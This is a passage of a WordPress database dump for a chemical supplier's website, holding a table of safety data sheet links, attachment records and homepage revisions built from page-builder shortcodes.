href="https://www.miller-stephenson.com/miller/sds/3200MD.pdf">MS-32XXMD</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/NRT960.pdf">Vydax NRT 960</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/VPFXP.pdf">VACUUM PUMP FLUID XP</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/8280.pdf">EPON RESIN 8280</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/730L.pdf">MS-730L</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/XP35.pdf">X-P35</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/RAIPA5.pdf">RA/IPA-5</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/XHT500AF.pdf">XHT-500AF</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/8281.pdf">EPON RESIN 8281</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/738.pdf">MS-738</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/H0805B.pdf">H0805B</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/RAIPA15.pdf">RA/IPA-15</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/XHToils.pdf">XHT-OILS</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/58005.pdf">EPON RESIN 58005</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/738.pdf">MS-738M</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/H1112B.pdf">H1112B</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/RAIPA.pdf">DryFilm RA/IPA</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/XHTAC.pdf">XHT-AC, ACX</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/58034.pdf">EPON RESIN 58034</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/745.pdf">MS-745</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/VertrelSDG.pdf">Vertrel SDG</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/RA.pdf">DryFilm RA</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/XHTBD.pdf">XHT-BD, BDX, BDZ</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/1510.pdf">EPONEX 1510</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/750.pdf">MS-750</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/VertrelSFR.pdf">Vertrel SFR</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/XHTS.pdf">XHT-S, SX, SZ</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/WD510.pdf">EPI-REZ WD-510</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/750.pdf">MS-750M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/GPL2E.pdf">GPL 2E SERIES</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/3522W60.pdf">EPI-REZ 3522-W-60</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/755.pdf">MS-755</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/fluoroguard.pdf">PCA,PRO,SG</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/5003W55.pdf">EPI-REZ 5003-W-55</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/755.pdf">MS-755M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/5520W60.pdf">EPI-REZ 5520-W-60</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/755L.pdf">MS-755L</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/5522WY55.pdf">EPI-REZ 5522-WY-55</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/760.pdf">MS-760</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/3015.pdf">EPIKURE 3015</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/760.pdf">MS-760M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/3046.pdf">EPIKURE 3046</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/765.pdf">MS-765</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/3055.pdf">EPIKURE 3055</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/770.pdf">MS-770</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/3115.pdf">EPIKURE 3115</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/770.pdf">MS-770M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/3125.pdf">EPIKURE 3125</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/775.pdf">MS-775</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/3140.pdf">EPIKURE 3140</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/775.pdf">MS-775M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/3155.pdf">EPIKURE 3155</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/780.pdf">MS-780</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/3164.pdf">EPIKURE 3164</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/780.pdf">MS-780M</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/3223.pdf">EPIKURE 3223</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/795.pdf">MS-795</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/3234.pdf">EPIKURE 3234</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/795.pdf">MS-795M</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/3245.pdf">EPIKURE 3245</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/110X.pdf">MS-110X</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/3253.pdf">EPIKURE 3253</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/120X.pdf">MS-120X</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/3270.pdf">EPIKURE 3270</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/120XXP.pdf">MS-120X-XP</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/3271.pdf">EPIKURE 3271</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/H0805A.pdf">H0805A</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/3274.pdf">EPIKURE 3274</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/J0912A.pdf">J0912A</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/3282.pdf">EPIKURE 3282</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/K0725A.pdf">K0725A</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/3290.pdf">EPIKURE 3290</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/K1016A.pdf">K1016A</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/3295.pdf">EPIKURE 3295</a></td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/W.pdf">CURING AGENT W</a></td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/K54.pdf">ANCAMINE K54</a></td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/K61B.pdf">ANCAMINE K61B</a></td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/BDMA.pdf">BDMA</a></td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/BF3400.PDF">BF3-400</a></td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/DEAPA.pdf">DEAPA</a></td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/NMA.pdf">NMA</a></td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/V115.pdf">VERSAMID 115</a></td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/V125.pdf">VERSAMID 125</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/V140.pdf">VERSAMID 140</a></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'SDS', '', 'inherit', 'closed', 'closed', '', '1842-revision-v1', '', '', '2016-09-23 12:46:40', '2016-09-23 12:46:40', '', 1842, 'https://www.miller-stephenson.com/1842-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1982, 3, '2016-09-23 16:27:32', '2016-09-23 16:27:32', '', 'tds-122ad-new-format', '', 'inherit', 'open', 'closed', '', 'tds-122ad-new-format', '', '', '2016-09-23 16:27:32', '2016-09-23 16:27:32', '', 1677, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/TDS-122AD-new-format.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1983, 3, '2016-09-23 16:30:41', '2016-09-23 16:30:41', '', 'tds-122xd-new-format', '', 'inherit', 'open', 'closed', '', 'tds-122xd-new-format', '', '', '2016-09-23 16:30:41', '2016-09-23 16:30:41', '', 1681, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/TDS-122XD-new-format.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1984, 3, '2016-09-23 16:36:55', '2016-09-23 16:36:55', '', 'epikure', '', 'inherit', 'open', 'closed', '', 'epikure-4', '', '', '2016-09-23 16:36:55', '2016-09-23 16:36:55', '', 1209, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-1.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1985, 3, '2016-09-23 16:38:28', '2016-09-23 16:38:28', '', 'epikure', '', 'inherit', 'open', 'closed', '', 'epikure-5', '', '', '2016-09-23 16:38:28', '2016-09-23 16:38:28', '', 1191, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-2.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1986, 3, '2016-09-23 16:40:37', '2016-09-23 16:40:37', '', 'epikure', '', 'inherit', 'open', 'closed', '', 'epikure-6', '', '', '2016-09-23 16:40:37', '2016-09-23 16:40:37', '', 1063, 'https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPIKURE-2.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1987, 3, '2016-09-23 16:53:49', '2016-09-23 16:53:49', '', '3253', '', 'inherit', 'open', 'closed', '', '3253', '', '', '2016-09-23 16:53:49', '2016-09-23 16:53:49', '', 1865, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/3253.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1988, 3, '2016-09-23 16:59:03', '2016-09-23 16:59:03', '', 'epirez-3522-w-60', '', 'inherit', 'open', 'closed', '', 'epirez-3522-w-60', '', '', '2016-09-23 16:59:03', '2016-09-23 16:59:03', '', 1031, 'https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPIREZ-3522-W-60.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1989, 3, '2016-09-23 17:00:28', '2016-09-23 17:00:28', '', 'epirez-5003-w-55', '', 'inherit', 'open', 'closed', '', 'epirez-5003-w-55', '', '', '2016-09-23 17:00:28', '2016-09-23 17:00:28', '', 1033, 'https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPIREZ-5003-W-55.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1990, 3, '2016-09-23 17:04:42', '2016-09-23 17:04:42', '', 'epirez-5522-wy-55', '', 'inherit', 'open', 'closed', '', 'epirez-5522-wy-55', '', '', '2016-09-23 17:04:42', '2016-09-23 17:04:42', '', 1035, 'https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPIREZ-5522-WY-55.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1993, 2, '2016-09-23 17:11:27', '2016-09-23 17:11:27', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\r\n\r\n[col span="4"]\r\n\r\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\r\n\r\n[text_box width="40" width__sm="60" position_y="85"]\r\n\r\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\r\n\r\n\r\n[/text_box]\r\n[text_box]\r\n\r\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\r\n\r\n[/text_box]\r\n[text_box position_y="20"]\r\n\r\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Quality &amp; Service</span></em></h3>\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="503px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="MS-MEDICAL" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="322px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="80" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/ux_banner_grid]\r\n[row]\r\n\r\n[col]\r\n\r\n[gap height="5px"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="4" align="0"]\r\n\r\n<h3>Technical Support</h3>\r\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n<h3>Application Experts</h3>\r\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n<h3>Large Inventory</h3>\r\n<p>We are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.</p>\r\n\r\n[/col]\r\n\r\n[/row]\r\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\r\n\r\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\r\n\r\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\r\n<h1><strong>ReleaSys </strong></h1>\r\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\r\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[gap]\r\n\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1588" image_size="Original"]\r\n\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1618" image_size="Original"]\r\n\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1614" image_size="Original"]\r\n\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1617"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1620"]\r\n\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1580"]\r\n\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id=1992"]\r\n\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1586"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-23 17:11:27', '2016-09-23 17:11:27', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1994, 2, '2016-09-23 17:13:00', '2016-09-23 17:13:00', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\r\n\r\n[col span="4"]\r\n\r\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\r\n\r\n[text_box width="40" width__sm="60" position_y="85"]\r\n\r\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\r\n\r\n\r\n[/text_box]\r\n[text_box]\r\n\r\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\r\n\r\n[/text_box]\r\n[text_box position_y="20"]\r\n\r\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Quality &amp; Service</span></em></h3>\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="503px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="MS-MEDICAL" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="322px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="80" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/ux_banner_grid]\r\n[row]\r\n\r\n[col]\r\n\r\n[gap height="5px"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="4" align="0"]\r\n\r\n<h3>Technical Support</h3>\r\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n<h3>Application Experts</h3>\r\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n<h3>Large Inventory</h3>\r\n<p>We are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.</p>\r\n\r\n[/col]\r\n\r\n[/row]\r\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\r\n\r\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\r\n\r\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\r\n<h1><strong>ReleaSys </strong></h1>\r\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\r\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[gap]\r\n\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1588" image_size="Original"]\r\n\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1618" image_size="Original"]\r\n\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1614" image_size="Original"]\r\n\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1617"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1620"]\r\n\r\n\r\n[/col]\r\n[col 